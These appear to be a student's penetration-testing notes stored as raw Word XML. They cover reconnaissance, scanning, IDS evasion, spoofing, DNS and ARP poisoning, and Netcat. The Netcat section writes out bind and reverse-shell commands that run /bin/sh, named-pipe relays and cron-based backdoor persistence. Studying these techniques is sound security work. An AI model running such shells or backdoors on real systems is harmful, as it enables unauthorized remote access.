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D25E" w14:textId="03259C64" w:rsid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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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proofErr w:type="spellEnd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hacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2B14">
        <w:rPr>
          <w:rStyle w:val="Heading1Char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54ED6A90" w14:textId="77777777" w:rsid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EFED0A1" w14:textId="77777777" w:rsid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AA2C996" w14:textId="0E29E805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(Web):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whois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domain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registrar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nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="521C682B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50A05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scanning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old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has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custom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NSE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scripts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has a GUI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Zenmap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scans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are more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stealthy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aggressive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E37D5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Firewalk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looks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ports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on a firewall </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE0D44D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IDS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signatures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circumvent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Tiny fragment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 or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Fragment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overlap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attack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FragRoute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14:paraId="023D535C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3AB8B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tiny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wardriving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Wardriving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act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 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searching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Wi-Fi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wireless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networks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usually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moving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vehicle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laptop or smartphone.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Easily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doable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via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airng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airgeddon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third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party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scripts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on Linux,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android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app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called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"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WiGLE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WiFi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C8B309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Google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dorks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search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queries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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2689524E" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27300E" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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[cache:</w:t>
      </w:r>
      <w:hyperlink r:id="rId5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www.google.com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 web]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cached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“web”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highlighted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accessible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Cached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Google’s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[cache:]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Google has in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cache.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, [cache:</w:t>
      </w:r>
      <w:hyperlink r:id="rId6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www.google.com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Google’s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cache of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B925A" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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DA7DE8" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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[link:</w:t>
      </w:r>
      <w:hyperlink r:id="rId7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www.google.com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webpages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links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pointing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D06BF" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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related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98A294" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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[related:</w:t>
      </w:r>
      <w:hyperlink r:id="rId8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www.google.com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list web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1F5C2" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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info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35E0631" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2B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[info:</w:t>
      </w:r>
      <w:hyperlink r:id="rId9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www.google.com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0633D" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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define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8BE20B" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2B14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:]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definition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gathered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definition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phrase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exact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typed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). Eg: [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define:google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36B9364" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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Google 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Dorks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 List and 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Updated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 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Database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 in 2022 | AOFIRS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61024389" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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GitHub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 - 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sensepost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/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wikto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: Nikto </w:t>
        </w:r>
        <w:proofErr w:type="spellStart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>for</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00AC2B14">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="006E7E"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve"> Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AC2B1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automate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dorking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EE5C14D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57B58" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2B14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AC2B1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OSINT</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2B14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14:paraId="01C9A6AE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Maltego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Maltego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software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open-source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intelligence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forensics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developed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by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Paterva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Maltego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focuses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on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providing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library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transforms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discovery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open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sources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and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visualizing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information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graph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format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suitable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link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analysis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mining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00C0E2B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Awesome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OSINT list has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lot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of...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awesome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tools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well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: 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begin"/>
      </w:r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instrText xml:space="preserve"> HYPERLINK "https://github.com/jivoi/awesome-osint" </w:instrText>
      </w:r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separate"/>
      </w:r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GitHub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-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jivoi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/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awesome-osint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: A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curated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list of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amazingly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awesome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OSINT</w:t>
      </w:r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end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="598860DD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D593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Vuln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Scanners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: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Nessus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Acunetix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Netsparker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Burpsuite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 etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682659B1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BCDB8" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2B14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AC2B14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</w:rPr>
        <w:t xml:space="preserve">IP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</w:rPr>
        <w:t>Address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</w:rPr>
        <w:t>spoofing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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FCD55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Spoofing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means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pretending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someone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else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It's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quite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common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attack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against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systems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utilize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IP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addresses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control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access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authentication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One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built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-in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linux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commands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e.g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.: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ifconfig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(interface) (IP)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netmask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netmask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).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Nmap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also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has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built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-in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spoofing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capabilities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you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packet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crafting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tool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build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packets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such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Scapy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 (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script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works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on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OS),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hping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netdude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etc.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Spoofing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datagram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protocols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trivial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because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there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session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created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TCP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however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due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its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three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way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handshake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principle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which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ISN (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initial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sequence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number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which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number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purposefully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difficult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guess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)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hard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spoof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because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connection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simply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gets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reset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upon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wrong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ISN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initiated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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C150647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EA7CF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Source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routing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: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A989E1F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attack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involves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source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routed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packet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appears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originate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legitimate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user,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includes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fake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route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list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includes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attacker's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address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Only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one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path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routers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between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attacker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victim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must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allow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source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routed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traffic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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF6D0A5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2B6D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Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0921B424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a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command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line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tool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responsible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reading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writing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in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network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. To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exchange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Netcat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uses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network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protocols</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2B14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TCP/IP and UDP.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exfil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shells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087DC0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-l or -L (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creates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listener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on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specific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port, L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persistent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listener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79CD232F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-e (program to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execute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after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connection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nice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backdoors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4DCBCCC4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-z (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zero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I/O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mode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useful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scanning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14:paraId="1E7B5D70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Example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usage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after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gaining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login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prompt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some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other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backdoor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at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any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port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either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tcp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or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udp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-l -p (port) -e /bin/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sh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(or cmd.exe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Windows) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBC4A2E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persistence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if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-L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flag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isn't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supported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schedule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cron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job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or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 "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while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"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loop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shell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script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chmod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be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readable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executable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nohup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command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logout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keep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going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i/>
          <w:iCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B76C544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Reverse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shells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Netcat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push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shell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session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client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server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A9399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listener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-l -p (port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D42E1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listenerIP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) (port) -e /bin/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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B7B7399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0EA7D3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90B11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Netcat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Relays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003A549C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On </w:t>
      </w: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. ncrelay.bat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next_hop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54321" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CC9872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relay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-l -p 1111 -e ncrelay.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C013AF6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>On </w:t>
      </w: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" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163FC6A9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mknod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FIFO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carry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forth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B50C53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-l -p 11111 0&lt;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|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next_hop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54321 1&gt;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14:paraId="67A69834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you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don't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need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sudo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relay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on a Unix on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ports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greater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than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1023, on Windows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any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port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be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used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without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admin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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>privileges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D29EABD" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2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some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versions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netcat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don't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-e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bash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relay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Netcat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roughly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works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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>way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F4B6C" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2B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D4453" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2B1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mknod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</w:p>
    <w:p w14:paraId="1753190B" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2B1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/bin/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bash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0&lt;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|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-l -p 8080 1&gt;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backpipe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functionally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equivalent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"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nc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-l -p 8080 -e /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F47C42" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC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FD1D5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nc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-w 2 -z 192.168.10.1 1-1024 -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runs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a port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scan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, -w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means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wait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, -z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specifies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to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only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search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for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listening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services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and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not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send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any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data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, 1-1024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is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the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 xml:space="preserve"> port </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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range</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2B14">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="E9E9E9" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0831BAC3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69145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Dsniff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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208FFA61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A suite of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sniffing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do ARP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poisonig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kill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connections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sniff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critical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852DE2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E1E5A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DNS cache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poisoning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781F4812" w14:textId="69B29342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348A0F" wp14:editId="113CEF3C">
            <wp:extent cx="3878580" cy="2811780"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="2" name="Picture 2" descr="dns recursive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 recursive que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D186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EEC9A" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2B1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DNSSEC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Protection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against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cache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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poisoning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2B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62E7B180" w14:textId="4E2CC095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B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14362" wp14:editId="2EB76F12">
            <wp:extent cx="5760720" cy="3145155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="DNSSEC DNS cache poisoning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SSEC DNS cache poisoning prot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685E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2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"https://geekflare.com/understanding-dns-cache-poisoning/" </w:instrText>
      </w:r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What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is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DNS Cache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Poisoning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-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How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it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Works and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Prevention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Measures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? (geekflare.com)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E5DDB6D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7D968" w14:textId="77777777" w:rsidR="00AC2B14" w:rsidRPr="00AC2B14" w:rsidRDefault="00AC2B14" w:rsidP="00AC2B1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payload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 w:rsidRPr="00AC2B14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2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"https://www.offensive-security.com/metasploit-unleashed/payload-types/" </w:instrText>
      </w:r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Payload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Types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-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Metasploit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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>Unleashed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="006E7E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (offensive-security.com)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2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F05A41" w14:textId="77777777" w:rsidR="00765F44" w:rsidRDefault="00765F44"/>
    <w:sectPr w:rsidR="00765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04B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08608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525E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8AB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4"/>
    <w:rsid w:val="00765F44"/>
    <w:rsid w:val="00A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0DB4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D18BFD58-ECE2-4C8D-B634-1BB232F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2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B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B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B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B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2B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B14"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="line-numbers">
    <w:name w:val="line-numbers"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00AC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hyperlink" Target="https://github.com/sensepost/wikto" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.googl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ofirs.org/articles/google-dork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961</Words>
  <Characters>5482</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>45</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>ESET, spol. s r.o.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Korba</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Peter Korba</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-08T14:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-08T14:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>